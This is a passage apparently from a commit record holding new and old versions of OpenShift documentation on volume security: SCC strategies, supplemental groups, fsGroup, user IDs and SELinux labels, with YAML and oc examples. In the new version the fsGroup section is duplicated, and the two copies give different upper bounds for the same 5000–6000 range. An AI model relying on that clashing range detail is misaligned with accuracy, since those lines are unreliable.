that\nstrategy to be defined in the pod definition (and\/or image). When this applies\nto the user ID (`*runAsUser*`) it is prudent to restrict access to the SCC to\nprevent a container from being able to run as root.\n\nBecause pods often match the *restricted* SCC, it is worth knowing the security\nthis entails. The *restricted* SCC has the following characteristics:\n\n- User IDs are constrained due to the `*runAsUser*` strategy being set to\n*MustRunAsRange*. 
This forces user ID validation.\n- Because a range of allowable user IDs is not defined in the SCC (see `oc export\nscc restricted` for more details), the project's\n`*openshift.io\/sa.scc.uid-range*` range will be used for range checking and for\na default ID, if needed.\n- A default user ID is produced when a user ID is not specified in the pod\ndefinition and the matching SCC's `*runAsUser*` is set to *MustRunAsRange*.\n- An SELinux label is required (`seLinuxContext` set to *MustRunAs*), which uses\nthe project's default MCS label.\n- Arbitrary supplemental group IDs are allowed because no range checking is\nrequired. This is a result of both the `*supplementalGroups*` and `*fsGroup*`\nstrategies being set to *RunAsAny*.\n- Default supplemental groups are not produced for the running pod due to\n*RunAsAny* for the two group strategies above. Therefore, if no groups are\ndefined in the pod definition (or in the image), the container(s) will have no\nsupplemental groups predefined.\n\nThe following shows the *default* project and a custom SCC (*my-custom-scc*),\nwhich summarizes the interactions of the SCC and the project:\n\n====\n----\n$ oc get project default -o yaml <1>\n...\nmetadata:\n annotations: <2>\n openshift.io\/sa.scc.mcs: s0:c1,c0 <3>\n openshift.io\/sa.scc.supplemental-groups: 1000000000\/10000 <4>\n openshift.io\/sa.scc.uid-range: 1000000000\/10000 <5>\n\n$ oc get scc my-custom-scc -o yaml\n...\nfsGroup:\n type: MustRunAs <6>\n ranges:\n - min: 5000\n max: 6000\nrunAsUser:\n type: MustRunAsRange <7>\n uidRangeMin: 1000100000\n uidRangeMax: 1000100999\nseLinuxContext: <8>\n type: MustRunAs\n SELinuxOptions: <9>\n user: <selinux-user-name>\n role: ...\n type: ...\n level: ...\nsupplementalGroups:\n type: MustRunAs <6>\n ranges:\n - min: 5000\n max: 6000\n----\n<1> *default* is the name of the project.\n<2> Default values are only produced when the corresponding SCC strategy is not\n*RunAsAny*.\n<3> SELinux default when not defined in the pod definition or in the SCC.\n<4> Range of allowable group IDs. ID validation only occurs when the SCC\nstrategy is not *RunAsAny*. There can be more than one range specified, separated by\ncommas. See below for xref:volsec-rangeformats[supported formats].\n<5> Same as *<4>* but for user IDs. Also, only a single range of user IDs is\nsupported.\n<6> *MustRunAs* enforces group ID range checking and provides the container's\ngroups default. Based on this SCC definition, the default is 5000 (the minimum\nID value). If the range was omitted from the SCC, then the default would be\n1000000000 (derived from the project). The other supported type, *RunAsAny*, does not\nperform range checking, thus allowing any group ID, and produces no default\ngroups.\n<7> *MustRunAsRange* enforces user ID range checking and provides a UID default.\nBased on this SCC, the default UID is 1000100000 (the minimum value). If the minimum\nand maximum range were omitted from the SCC, the default user ID would be\n1000000000 (derived from the project). *MustRunAsNonRoot* and *RunAsAny* are\nthe other supported types. The range of allowed IDs can be defined to include\nany user IDs required for the target storage.\n<8> When set to *MustRunAs*, the container is created with the SCC's SELinux\noptions, or the MCS default defined in the project. A type of *RunAsAny*
A type of *RunAsAny*\nindicates that SELinux context is not required, and, if not defined in the pod,\nis not set in the container.\n<9> The SELinux user name, role name, type, and labels can be defined here.\n====\n\n[[volsec-rangeformats]]\nTwo formats are supported for allowed ranges:\n\n1. `M\/N`, where `M` is the starting ID and `N` is the count, so the range becomes\n`M` through (and including) `M+N-1`.\n\n2. `M-N`, where `M` is again the starting ID and `N` is the ending ID. The default\ngroup ID is the starting ID in the first range, which is `1000000000` in this\nproject. If the SCC did not define a minimum group ID, then the project's\ndefault ID is applied.\n\n[[supplemental-groups]]\n== Supplemental Groups\n\n[NOTE]\n====\nRead xref:sccs-defaults-allowed-ranges[SCCs, Defaults, and Allowed Ranges]\nbefore working with supplemental groups.\n====\n\n[TIP]\n====\nIt is generally preferable to use group IDs (supplemental or\nxref:fsgroup[fsGroup]) to gain access to persistent storage versus using\nxref:user-id[user IDs].\n====\n\nSupplemental groups are regular Linux groups. When a process runs in Linux, it\nhas a UID, a GID, and one or more supplemental groups. These attributes can be\nset for a container's main process. The `*supplementalGroups*` IDs are typically\nused for controlling access to shared storage, such as NFS and GlusterFS,\nwhereas xref:fsgroup[fsGroup] is used for controlling access to block storage,\nsuch as Ceph RBD and iSCSI.\n\nThe {product-title} shared storage plug-ins mount volumes such that the POSIX\npermissions on the mount match the permissions on the target storage. For\nexample, if the target storage's owner ID is *1234* and its group ID is *5678*, then\nthe mount on the host node and in the container will have those same IDs.\nTherefore, the container's main process must match one or both of those IDs in\norder to access the volume.\n\n[[nfs-example]]\nFor example, consider the following NFS export.\n\nOn an {product-title} node:\n\n[NOTE]\n====\n`showmount` requires access to the ports used by `rpcbind` and `rpc.mount` on\nthe NFS server\n====\n\n====\n----\n# showmount -e <nfs-server-ip-or-hostname>\nExport list for f21-nfs.vm:\n\/opt\/nfs *\n----\n====\n\nOn the NFS server:\n\n====\n----\n# cat \/etc\/exports\n\/opt\/nfs *(rw,sync,root_squash)\n...\n\n# ls -lZ \/opt\/nfs -d\ndrwx------. 1000100001 5555 unconfined_u:object_r:usr_t:s0 \/opt\/nfs\n----\n====\n\nThe *_\/opt\/nfs\/_* export is accessible by UID *1000100001* and the group *5555*. In\ngeneral, containers should not run as root. So, in this NFS example, containers\nwhich are not run as UID *1000100001* and are not members the group *5555* will not\nhave access to the NFS export.\n\nOften, the SCC matching the pod does not allow a specific user ID to be\nspecified, thus using supplemental groups is a more flexible way to grant\nstorage access to a pod. For example, to grant NFS access to the export above,\nthe group *5555* can be defined in the pod definition:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Pod\n...\nspec:\n containers:\n - name: ...\n volumeMounts:\n - name: nfs <1>\n mountPath: \/usr\/share\/... <2>\n securityContext: <3>\n supplementalGroups: [5555] <4>\n volumes:\n - name: nfs <5>\n nfs:\n server: <nfs_server_ip_or_host>\n path: \/opt\/nfs <6>\n----\n<1> Name of the volume mount. Must match the name in the `*volumes*` section.\n<2> NFS export path as seen in the container.\n<3> Pod global security context. Applies to all containers inside the pod. 
Each\ncontainer can also define its `*securityContext*`, however group IDs are global\nto the pod and cannot be defined for individual containers.\n<4> Supplemental groups, which is an array of IDs, is set to 5555. This grants\ngroup access to the export.\n<5> Name of the volume. Must match the name in the `*volumeMounts*` section.\n<6> Actual NFS export path on the NFS server.\n====\n\nAll containers in the above pod (assuming the matching SCC or project allows the\ngroup *5555*) will be members of the group *5555* and have access to the volume,\nregardless of the container's user ID. However, the assumption above is\ncritical. Sometimes, the SCC does not define a range of allowable group IDs but\ninstead requires group ID validation (a result of `*supplementalGroups*` set to *MustRunAs*).\nNote that this is *not* the case for the *_restricted_* SCC. The project will not likely\nallow a group ID of *5555*, unless the project has been customized to access\nthis NFS export. So, in this scenario, the above pod will fail because its group\nID of *5555* is not within the SCC's or the project's range of allowed group\nIDs.\n\n[[scc-supplemental-groups]]\n*Supplemental Groups and Custom SCCs*\n\nTo remedy the situation in xref:nfs-example[the previous example], a custom SCC\ncan be created such that:\n\n- a minimum and max group ID are defined,\n- ID range checking is enforced, and\n- the group ID of *5555* is allowed.\n\nIt is often better to create a new SCC rather than modifying a predefined SCC, or\nchanging the range of allowed IDs in the predefined projects.\n\nThe easiest way to create a new SCC is to export an existing SCC and customize\nthe YAML file to meet the requirements of the new SCC. For example:\n\n. Use the *restricted* SCC as a template for the new SCC:\n+\n----\n$ oc export scc restricted > new-scc.yaml\n----\n\n. Edit the *_new-scc.yaml_* file to your desired specifications.\n\n. Create the new SCC:\n+\n----\n$ oc create -f new-scc.yaml\n----\n\n[NOTE]\n====\nThe `oc edit scc` command can be used to modify an instantiated SCC.\n====\n\nHere is a fragment of a new SCC named *nfs-scc*:\n\n====\n----\n$ oc export scc nfs-scc\n\nallowHostDirVolumePlugin: false <1>\n...\nkind: SecurityContextConstraints\nmetadata:\n ...\n name: nfs-scc <2>\npriority: 9 <3>\n...\nsupplementalGroups:\n type: MustRunAs <4>\n ranges:\n - min: 5000 <5>\n max: 6000\n...\n----\n<1> The `allow*` bools are the same as for the *restricted* SCC.\n<2> Name of the new SCC.\n<3> Numerically larger numbers have greater priority. Nil or omitted is the lowest\npriority. Higher priority SCCs sort before lower priority SCCs and thus have a\nbetter chance of matching a new pod.\n<4> `*supplementalGroups*` is a strategy and it is set to *MustRunAs*, which means\ngroup ID checking is required.\n<5> Multiple ranges are supported. 
The allowed group ID range here is 5000 through\n6000, with the default supplemental group being 5000.\n====\n\nWhen the same pod shown earlier runs against this new SCC (assuming, of course,\nthe pod matches the new SCC), it will start because the group *5555*,\nsupplied in the pod definition, is now allowed by the custom SCC.\n\n[[fsgroup]]\n== fsGroup\n\n[NOTE]\n====\nRead xref:sccs-defaults-allowed-ranges[SCCs, Defaults, and Allowed Ranges]\nbefore working with supplemental groups.\n====\n\n[TIP]\n====\nIt is generally preferable to use group IDs\n(xref:supplemental-groups[supplemental] or `*fsGroup*`) to gain access to\npersistent storage versus using xref:user-id[user IDs].\n====\n\n`*fsGroup*` defines a pod's \"file system group\" ID, which is added to the\ncontainer's supplemental groups. The `*supplementalGroups*` ID applies to shared\nstorage, whereas the `*fsGroup*` ID is used for block storage.\n\nBlock storage, such as Ceph RBD, iSCSI, and various cloud storage, is typically\ndedicated to a single pod which has requested the block storage volume, either\ndirectly or using a PVC. Unlike shared storage, block storage is taken over by a\npod, meaning that user and group IDs supplied in the pod definition (or image)\nare applied to the actual, physical block device. Typically, block storage is\nnot shared.\n\nA `*fsGroup*` definition is shown in the following pod definition\nfragment:\n\n====\n[source,yaml]\n----\nkind: Pod\n...\nspec:\n containers:\n - name: ...\n securityContext: <1>\n fsGroup: 5555 <2>\n ...\n----\n<1> As with `*supplementalGroups*`, `*fsGroup*` must be defined globally to the pod,\nnot per container.\n<2> 5555 will become the group ID for the volume's group permissions and for all new\nfiles created in the volume.\n====\n\nAs with `*supplementalGroups*`, all containers in the above pod (assuming the\nmatching SCC or project allows the group *5555*) will be members of the group\n*5555*, and will have access to the block volume, regardless of the container's\nuser ID. If the pod matches the *restricted* SCC, whose `*fsGroup*` strategy is\n*RunAsAny*, then any `*fsGroup*` ID (including *5555*) will be accepted.\nHowever, if the SCC has its `*fsGroup*` strategy set to *MustRunAs*, and *5555*\nis not in the allowable range of `*fsGroup*` IDs, then the pod will fail to run.\n\n[[scc-fsgroup]]\n*fsGroups and Custom SCCs*\n\nTo remedy the situation in the previous example, a custom SCC can be created such that:\n\n- a minimum and maximum group ID are defined,\n- ID range checking is enforced, and\n- the group ID of *5555* is allowed.\n\nIt is better to create new SCCs rather than modify a predefined SCC, or change\nthe range of allowed IDs in the predefined projects.\n\nConsider the following fragment of a new SCC definition:\n\n====\n----\n# oc export scc new-scc\n...\nkind: SecurityContextConstraints\n...\nfsGroup:\n type: MustRunAs <1>\n ranges: <2>\n - max: 6000\n min: 5000 <3>\n...\n----\n<1> *MustRunAs* triggers group ID range checking, whereas *RunAsAny* does not\nrequire range checking.\n<2> The range of allowed group IDs is 5000 through, and including, 6000. Multiple\nranges are supported but not used here. The default `*fsGroup*` is 5000, the minimum\nvalue in the range.\n<3> The minimum value (or the entire range) can be omitted from the SCC, and thus\nrange checking and generating a default value will defer to the project's\n`*openshift.io\/sa.scc.supplemental-groups*` range. 
\n\n[[fsgroup]]\n== fsGroup\n\n[NOTE]\n====\nRead xref:sccs-defaults-allowed-ranges[SCCs, Defaults, and Allowed Ranges]\nbefore working with `*fsGroup*` IDs.\n====\n\n[TIP]\n====\nIt is generally preferable to use group IDs\n(xref:supplemental-groups[supplemental] or `*fsGroup*`) to gain access to\npersistent storage versus using xref:user-id[user IDs].\n====\n\n`*fsGroup*` defines a pod's \"file system group\" ID, which is added to the\ncontainer's supplemental groups. The `*supplementalGroups*` ID applies to shared\nstorage, whereas the `*fsGroup*` ID is used for block storage.\n\nBlock storage, such as Ceph RBD, iSCSI, and various cloud storage, is typically\ndedicated to a single pod which has requested the block storage volume, either\ndirectly or using a PVC. Unlike shared storage, block storage is taken over by a\npod, meaning that user and group IDs supplied in the pod definition (or image)\nare applied to the actual, physical block device. Typically, block storage is\nnot shared.\n\nA `*fsGroup*` definition is shown in the following pod definition fragment:\n\n====\n[source,yaml]\n----\nkind: Pod\n...\nspec:\n containers:\n - name: ...\n securityContext: <1>\n fsGroup: 5555 <2>\n ...\n----\n<1> As with `*supplementalGroups*`, `*fsGroup*` must be defined globally to the pod,\nnot per container.\n<2> 5555 will become the group ID for the volume's group permissions and for all new\nfiles created in the volume.\n====\n\nAs with `*supplementalGroups*`, all containers in the above pod (assuming the\nmatching SCC or project allows the group *5555*) will be members of the group\n*5555*, and will have access to the block volume, regardless of the container's\nuser ID. If the pod matches the *restricted* SCC, whose `*fsGroup*` strategy is\n*RunAsAny*, then any `*fsGroup*` ID (including *5555*) will be accepted.\nHowever, if the SCC has its `*fsGroup*` strategy set to *MustRunAs*, and *5555*\nis not in the allowable range of `*fsGroup*` IDs, then the pod will fail to run.\n\n[[scc-fsgroup]]\n*fsGroups and Custom SCCs*\n\nTo remedy the situation in the previous example, a custom SCC can be created such that:\n\n- a minimum and maximum group ID are defined,\n- ID range checking is enforced, and\n- the group ID of *5555* is allowed.\n\nIt is better to create a new SCC rather than modifying a predefined SCC, or changing\nthe range of allowed IDs in the predefined projects.\n\nConsider the following fragment of a new SCC definition:\n\n====\n----\n# oc export scc new-scc\n...\nkind: SecurityContextConstraints\n...\nfsGroup:\n type: MustRunAs <1>\n ranges: <2>\n - max: 6000\n min: 5000 <3>\n...\n----\n<1> *MustRunAs* triggers group ID range checking, whereas *RunAsAny* does not\nrequire range checking.\n<2> Multiple ranges are supported but not used here. The allowed group ID range is\n5000 through, and including, 5999, with the default `*fsGroup*` being 5000.\n<3> The minimum value (or the entire range) can be omitted from the SCC, and thus\nrange checking and generating a default value will defer to the project's\n`*openshift.io\/sa.scc.supplemental-groups*` range. `*fsGroup*` and\n`*supplementalGroups*` use the same group field in the project; there is not a\nseparate range for `*fsGroup*`.\n====\n\nWhen the pod shown above runs against this new SCC (assuming, of course, the pod\nmatches the new SCC), it will start because the group *5555*, supplied in\nthe pod definition, is allowed by the custom SCC. Additionally, the pod will\n\"take over\" the block device, so when the block storage is viewed by a process\noutside of the pod, it will actually have *5555* as its group ID.\n\nVolumes that support block ownership management include:\n\n* AWS Elastic Block Store\n* OpenStack Cinder\n* Ceph RBD\n* GCE Persistent Disk\n* iSCSI\n* emptyDir\n* gitRepo\n\n[NOTE]\n====\nThis list is potentially incomplete.\n====\n\n[[user-id]]\n== User IDs\n\n[NOTE]\n====\nRead xref:sccs-defaults-allowed-ranges[SCCs, Defaults, and Allowed Ranges]\nbefore working with user IDs.\n====\n\n[TIP]\n====\nIt is generally preferable to use group IDs\n(xref:supplemental-groups[supplemental] or xref:fsgroup[fsGroup]) to gain\naccess to persistent storage versus using user IDs.\n====\n\nUser IDs can be defined in the container image or in the pod definition. In the\npod definition, a single user ID can be defined globally to all containers, or\nspecific to individual containers (or both). A user ID is supplied as shown in\nthe pod definition fragment below:\n\n[[pod-user-id-1000100001]]\n====\n[source,yaml]\n----\nspec:\n containers:\n - name: ...\n securityContext:\n runAsUser: 1000100001\n----\n====\n\nID 1000100001 in the above is container-specific and matches the owner ID on the\nexport. If the NFS export's owner ID was *54321*, then that number would be used\nin the pod definition. Specifying `*securityContext*` outside of the container\ndefinition makes the ID global to all containers in the pod.\n\nSimilar to group IDs, user IDs may be validated according to policies set in the\nSCC and\/or project. If the SCC's `*runAsUser*` strategy is set to *RunAsAny*,\nthen any user ID defined in the pod definition or in the image is allowed.\n\n[WARNING]\n====\nThis means even a UID of *0* (root) is allowed.\n====\n\nIf, instead, the `*runAsUser*` strategy is set to *MustRunAsRange*, then a\nsupplied user ID will be validated against a range of allowed IDs. If the pod\nsupplies no user ID, then the default ID is set to the minimum value of the range of\nallowable user IDs.\n\nReturning to the earlier xref:nfs-example[NFS example], the container needs its\nUID set to *1000100001*, which is shown in the pod fragment above. Assuming the\n*default* project and the *restricted* SCC, the pod's requested user ID of\n1000100001 will not be allowed, and therefore the pod will fail. The pod fails\nbecause:\n\n- it requests *1000100001* as its user ID,\n- all available SCCs use *MustRunAsRange* for their `*runAsUser*` strategy, so UID\nrange checking is required, and\n- *1000100001* is not included in the SCC or in the project's user ID range.\n\nTo remedy this situation, a new SCC can be created\nwith the appropriate user ID range. A new project could also be created with the\nappropriate user ID range defined. There are also other, less-preferred options:\n\n- The *restricted* SCC could be modified to include *1000100001* within its minimum and\nmaximum user ID range. This is not recommended as you should avoid modifying the\npredefined SCCs if possible.\n- The *restricted* SCC could be modified to use *RunAsAny* for the `*runAsUser*`\nvalue, thus eliminating ID range checking. This is *_strongly_* not recommended, as\ncontainers could run as root.\n- The *default* project's UID range could be changed to allow a user ID of\n*1000100001*. This is not generally advisable because only a single range of user IDs\ncan be specified, and thus other pods may not run if the range is altered. (The\nproject's current range can be inspected as shown below.)
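\n\nTo see which user IDs a project currently allows, the project's annotations can be inspected. A sketch, assuming the *default* project and an illustrative range of `1000000000\/10000`:\n\n----\n$ oc get project default -o yaml\n...\nmetadata:\n annotations:\n openshift.io\/sa.scc.uid-range: 1000000000\/10000\n...\n----\n\nIn this sketch the range covers user IDs 1000000000 through 1000009999, so a pod requesting UID *1000100001* would fall outside of it.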
\n\n[[scc-runasuser]]\n*User IDs and Custom SCCs*\n\nIt is good practice to avoid modifying the predefined SCCs if possible. The\npreferred approach is to create a custom SCC that better fits an organization's\nsecurity needs, or xref:..\/..\/dev_guide\/projects.adoc#create-a-project[create a\nnew project] that supports the desired user IDs.\n\nTo remedy the situation in the previous example, a custom SCC can be created\nsuch that:\n\n- a minimum and maximum user ID are defined,\n- UID range checking is still enforced, and\n- the UID of *1000100001* is allowed.\n\nFor example:\n\n====\n----\n$ oc export scc nfs-scc\n\nallowHostDirVolumePlugin: false <1>\n...\nkind: SecurityContextConstraints\nmetadata:\n ...\n name: nfs-scc <2>\npriority: 9 <3>\nrequiredDropCapabilities: null\nrunAsUser:\n type: MustRunAsRange <4>\n uidRangeMax: 1000100001 <5>\n uidRangeMin: 1000100001\n...\n----\n<1> The `allow*` boolean fields are the same as for the *restricted* SCC.\n<2> The name of this new SCC is *nfs-scc*.\n<3> Numerically larger numbers have greater priority. Nil or omitted is the lowest\npriority. Higher priority SCCs sort before lower priority SCCs, and thus have a\nbetter chance of matching a new pod.\n<4> The `*runAsUser*` strategy is set to *MustRunAsRange*, which means UID range\nchecking is enforced.\n<5> The UID range is 1000100001 through 1000100001 (a range of one value).\n====\n\nNow, with `*runAsUser: 1000100001*` shown in the previous pod definition fragment,\nthe pod matches the new *nfs-scc* and is able to run with a UID of 1000100001.\n\n[[selinuxoptions]]\n== SELinux Options\n\nAll predefined SCCs, except for the *privileged* SCC, set the `*seLinuxContext*`\nto *MustRunAs*. So the SCCs most likely to match a pod's requirements will force\nthe pod to use an SELinux policy. The SELinux policy used by the pod can be\ndefined in the pod itself, in the image, in the SCC, or in the project (which\nprovides the default).\n\nSELinux labels can be defined in a pod's `*securityContext.seLinuxOptions*`\nsection, which supports `*user*`, `*role*`, `*type*`, and `*level*`:\n\n[NOTE]\n====\nLevel and MCS label are used interchangeably in this topic.\n====\n\n====\n----\n...\n securityContext: <1>\n seLinuxOptions:\n level: \"s0:c123,c456\" <2>\n...\n----\n<1> `*level*` can be defined globally for the entire pod, or individually for each\ncontainer.\n<2> SELinux level label.\n====\n\nHere are fragments from an SCC and from the *default* project:\n\n====\n----\n$ oc export scc scc-name\n...\nseLinuxContext:\n type: MustRunAs <1>\n\n# oc export project default\n...\nmetadata:\n annotations:\n openshift.io\/sa.scc.mcs: s0:c1,c0 <2>\n...\n----\n<1> *MustRunAs* causes volume relabeling.\n<2> If the label is not provided in the pod or in the SCC, then the default comes\nfrom the project.\n====\n\nBecause the `*seLinuxContext*` strategy of the predefined SCCs is *MustRunAs*, pods\nare forced to use MCS labels, which can be defined in the pod definition, in the\nimage, or provided as a default.\n\nThe SCC determines whether or not to require an SELinux label and can provide a\ndefault label. 
If the `*seLinuxContext*` strategy is set to *MustRunAs* and the\npod (or image) does not define a label, {product-title} defaults to a label\nchosen from the SCC itself or from the project.\n\nIf `*seLinuxContext*` is set to *RunAsAny*, then no\ndefault labels are provided, and the container determines the final label. In\nthe case of Docker, the container will use a unique MCS label, which will not\nlikely match the labeling on existing storage mounts. Volumes which support\nSELinux management will be relabeled so that they are accessible by the\nspecified label and, depending on how exclusionary the label is, only that\nlabel.\n\nThis means two things for unprivileged containers:\n\n- The volume will be given a `*type*` which is accessible by unprivileged\ncontainers. This `*type*` is usually *svirt_sandbox_file_t*.\n- If a `*level*` is specified, the volume will be labeled with the given MCS\nlabel.\n\nFor a volume to be accessible by a pod, the pod must have both categories of the volume.\nSo a pod with *s0:c1,c2* will be able to access a volume with *s0:c1,c2*. A volume with\n*s0* will be accessible by all pods.\n\nIf pods fail authorization, or if the storage mount is failing due to\npermissions errors, then there is a possibility that SELinux enforcement is\ninterfering. One way to check for this is to run:\n\n----\n# ausearch -m avc --start recent\n----\n\nThis examines the log file for AVC (Access Vector Cache) errors.\n","old_contents":"[[install-config-persistent-storage-pod-security-context]]\n= Volume Security\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\n\nThis topic provides a general guide on pod security as it relates to volume\nsecurity. For information on pod-level security in general, see\nxref:..\/..\/admin_guide\/manage_scc.adoc#admin-guide-manage-scc[Managing Security Context Constraints\n(SCC)] and the\nxref:..\/..\/architecture\/additional_concepts\/authorization.adoc#security-context-constraints[Security\nContext Constraint] concept topic. For information on the {product-title}\npersistent volume (PV) framework in general, see the\nxref:..\/..\/architecture\/additional_concepts\/storage.adoc#architecture-additional-concepts-storage[Persistent Storage]\nconcept topic.\n\nAccessing persistent storage requires coordination between the cluster and\/or\nstorage administrator and the end developer. The cluster administrator creates\nPVs, which abstract the underlying physical storage. The developer creates pods\nand, optionally, PVCs, which bind to PVs, based on matching criteria, such as\ncapacity.\n\nMultiple persistent volume claims (PVCs) within the same project can bind to the\nsame PV. However, once a PVC binds to a PV, that PV cannot be bound by a claim\noutside of the first claim's project. If the underlying storage needs to be\naccessed by multiple projects, then each project needs its own PV, which can\npoint to the same physical storage. In this sense, a bound PV is tied to a\nproject. 
For a detailed PV and PVC example, see the guide for\nhttps:\/\/github.com\/openshift\/origin\/tree\/master\/examples\/wordpress[WordPress and\nMySQL using NFS].\n\nFor the cluster administrator, granting pods access to PVs involves:\n\n- knowing the group ID and\/or user ID assigned to the actual storage,\n- understanding SELinux considerations, and\n- ensuring that these IDs are allowed in the range of legal IDs defined for the\nproject and\/or the SCC that matches the requirements of the pod.\n\nGroup IDs, the user ID, and SELinux values are defined in the\n`*SecurityContext*` section in a pod definition. Group IDs are global to the pod\nand apply to all containers defined in the pod. User IDs can also be global, or\nspecific to each container. Four sections control access to volumes:\n\n- xref:supplemental-groups[`*supplementalGroups*`]\n- xref:fsgroup[`*fsGroup*`]\n- xref:user-id[`*runAsUser*`]\n- xref:selinuxoptions[`*seLinuxOptions*`]\n\n[[sccs-defaults-allowed-ranges]]\n== SCCs, Defaults, and Allowed Ranges\n\nSCCs influence whether or not a pod is given a default user ID, `*fsGroup*` ID,\nsupplemental group ID, and SELinux label. They also influence whether or not IDs\nsupplied in the pod definition (or in the image) will be validated against a\nrange of allowable IDs. If validation is required and fails, then the pod will\nalso fail.\n\nSCCs define strategies, such as `*runAsUser*`, `*supplementalGroups*`, and\n`*fsGroup*`. These strategies help decide whether the pod is authorized.\nStrategy values set to *RunAsAny* are essentially stating that the pod can do\nwhat it wants regarding that strategy. Authorization is skipped for that\nstrategy and no {product-title} default is produced based on that strategy.\nTherefore, IDs and SELinux labels in the resulting container are based on\ncontainer defaults instead of {product-title} policies.\n\nFor a quick summary of *RunAsAny*:\n\n- Any ID defined in the pod definition (or image) is allowed.\n- Absence of an ID in the pod definition (and in the image) results in the\ncontainer assigning an ID, which is *root* (0) for Docker.\n- No SELinux labels are defined, so Docker will assign a unique label.\n\nFor these reasons, SCCs with *RunAsAny* for ID-related strategies should be\nprotected so that ordinary developers do not have access to the SCC. On the\nother hand, SCC strategies set to *MustRunAs* or *MustRunAsRange* trigger ID\nvalidation (for ID-related strategies), and cause default values to be supplied\nby {product-title} to the container when those values are not supplied directly\nin the pod definition or image.\n\nSCCs may define the range of allowed IDs (user or groups). If range checking is\nrequired (for example, using *MustRunAs*) and the allowable range is not defined\nin the SCC, then the project determines the ID range. Therefore, projects\nsupport ranges of allowable ID. However, unlike SCCs, projects do not define\nstrategies, such as `*runAsUser*`.\n\nAllowable ranges are helpful not only because they define the boundaries for\ncontainer IDs, but also because the minimum value in the range becomes the\ndefault value for the ID in question. For example, if the SCC ID strategy value\nis *MustRunAs*, the minimum value of an ID range is *100*, and the ID is absent\nfrom the pod definition, then 100 is provided as the default for this ID.\n\nAs part of pod admission, the SCCs available to a pod are examined (roughly, in\npriority order followed by most restrictive) to best match the requests of the\npod. 
Setting an SCC's strategy type to *RunAsAny* is less restrictive, whereas a\ntype of *MustRunAs* is more restrictive. All of these strategies are evaluated.\nTo see which SCC was assigned to a pod, use the `oc get pod` command:\n\n====\n----\n# oc get pod <pod_name> -o yaml\n...\nmetadata:\n annotations:\n openshift.io\/scc: nfs-scc <1>\n name: nfs-pod1 <2>\n namespace: default <3>\n...\n----\n<1> Name of the SCC that the pod used (in this case, a custom SCC).\n<2> Name of the pod.\n<3> Name of the project. \"Namespace\" is interchangeable with \"project\" in\n{product-title}. See\nxref:..\/..\/architecture\/core_concepts\/projects_and_users.adoc#namespaces[Projects\nand Users] for details.\n====\n\nIt may not be immediately obvious which SCC was matched by a pod, so the command\nabove can be very useful in understanding the UID, supplemental groups, and\nSELinux relabeling in a live container.\n\nAny SCC with a strategy set to *RunAsAny* allows specific values for that\nstrategy to be defined in the pod definition (and\/or image). When this applies\nto the user ID (`*runAsUser*`), it is prudent to restrict access to the SCC to\nprevent a container from being able to run as root.\n\nBecause pods often match the *restricted* SCC, it is worth knowing the security\nthis entails. The *restricted* SCC has the following characteristics:\n\n- User IDs are constrained due to the `*runAsUser*` strategy being set to\n*MustRunAsRange*. This forces user ID validation.\n- Because a range of allowable user IDs is not defined in the SCC (see `oc export\nscc restricted` for more details), the project's\n`*openshift.io\/sa.scc.uid-range*` range will be used for range checking and for\na default ID, if needed.\n- A default user ID is produced when a user ID is not specified in the pod\ndefinition due to `*runAsUser*` being set to *MustRunAsRange*.\n- An SELinux label is required (`*seLinuxContext*` set to *MustRunAs*), which uses\nthe project's default MCS label.\n- Arbitrary supplemental group IDs are allowed because no range checking is\nrequired. This is a result of both the `*supplementalGroups*` and `*fsGroup*`\nstrategies being set to *RunAsAny*.\n- Default supplemental groups are not produced for the running pod due to\n*RunAsAny* for the two group strategies above. Therefore, if no groups are\ndefined in the pod definition (or in the image), the container(s) will have no\nsupplemental groups predefined.\n\nThe following shows the *default* project and a custom SCC (*my-custom-scc*),\nwhich summarizes the interactions of the SCC and the project:\n\n====\n----\n$ oc get project default -o yaml <1>\n...\nmetadata:\n annotations: <2>\n openshift.io\/sa.scc.mcs: s0:c1,c0 <3>\n openshift.io\/sa.scc.supplemental-groups: 1000000000\/10000 <4>\n openshift.io\/sa.scc.uid-range: 1000000000\/10000 <5>\n\n$ oc get scc my-custom-scc -o yaml\n...\nfsGroup:\n type: MustRunAs <6>\n ranges:\n - min: 5000\n max: 6000\nrunAsUser:\n type: MustRunAsRange <7>\n uidRangeMin: 65534\n uidRangeMax: 65634\nseLinuxContext: <8>\n type: MustRunAs\n SELinuxOptions: <9>\n user: <selinux-user-name>\n role: ...\n type: ...\n level: ...\nsupplementalGroups:\n type: MustRunAs <6>\n ranges:\n - min: 5000\n max: 6000\n----\n<1> *default* is the name of the project.\n<2> Default values are only produced when the corresponding SCC strategy is not\n*RunAsAny*.\n<3> SELinux default when not defined in the pod definition or in the SCC.\n<4> Range of allowable group IDs. ID validation only occurs when the SCC\nstrategy is *MustRunAs*. 
There can be more than one range specified, separated by\ncommas. See below for xref:volsec-rangeformats[supported formats].\n<5> Same as *<4>* but for user IDs. Also, only a single range of user IDs is\nsupported.\n<6> *MustRunAs* enforces group ID range checking and provides the container's\ngroups default. Based on this SCC definition, the default is 5000 (the minimum\nID value). If the range was omitted from the SCC, then the default would be\n1000000000 (derived from the project). The other supported type, *RunAsAny*, does not\nperform range checking, thus allowing any group ID, and produces no default\ngroups.\n<7> *MustRunAsRange* enforces user ID range checking and provides a UID default.\nBased on this SCC, the default UID is 65534 (the minimum value). If the minimum\nand maximum range were omitted from the SCC, the default user ID would be\n1000000000 (derived from the project). *MustRunAsNonRoot* and *RunAsAny* are\nthe other supported types. The range of allowed IDs can be defined to include\nany user IDs required for the target storage.\n<8> When set to *MustRunAs*, the container is created with the SCC's SELinux\noptions, or the MCS default defined in the project. A type of *RunAsAny*\nindicates that SELinux context is not required, and, if not defined in the pod,\nis not set in the container.\n<9> The SELinux user name, role name, type, and labels can be defined here.\n====\n\n[[volsec-rangeformats]]\nTwo formats are supported for allowed ranges:\n\n1. `M\/N`, where `M` is the starting ID and `N` is the count, so the range becomes\n`M` through (and including) `M+N-1`. For example, `1000000000\/10000` denotes the\nIDs 1000000000 through 1000009999.\n\n2. `M-N`, where `M` is again the starting ID and `N` is the ending ID. The default\ngroup ID is the starting ID in the first range, which is `1000000000` in this\nproject. If the SCC did not define a minimum group ID, then the project's\ndefault ID is applied.\n\n[[supplemental-groups]]\n== Supplemental Groups\n\n[NOTE]\n====\nRead xref:sccs-defaults-allowed-ranges[SCCs, Defaults, and 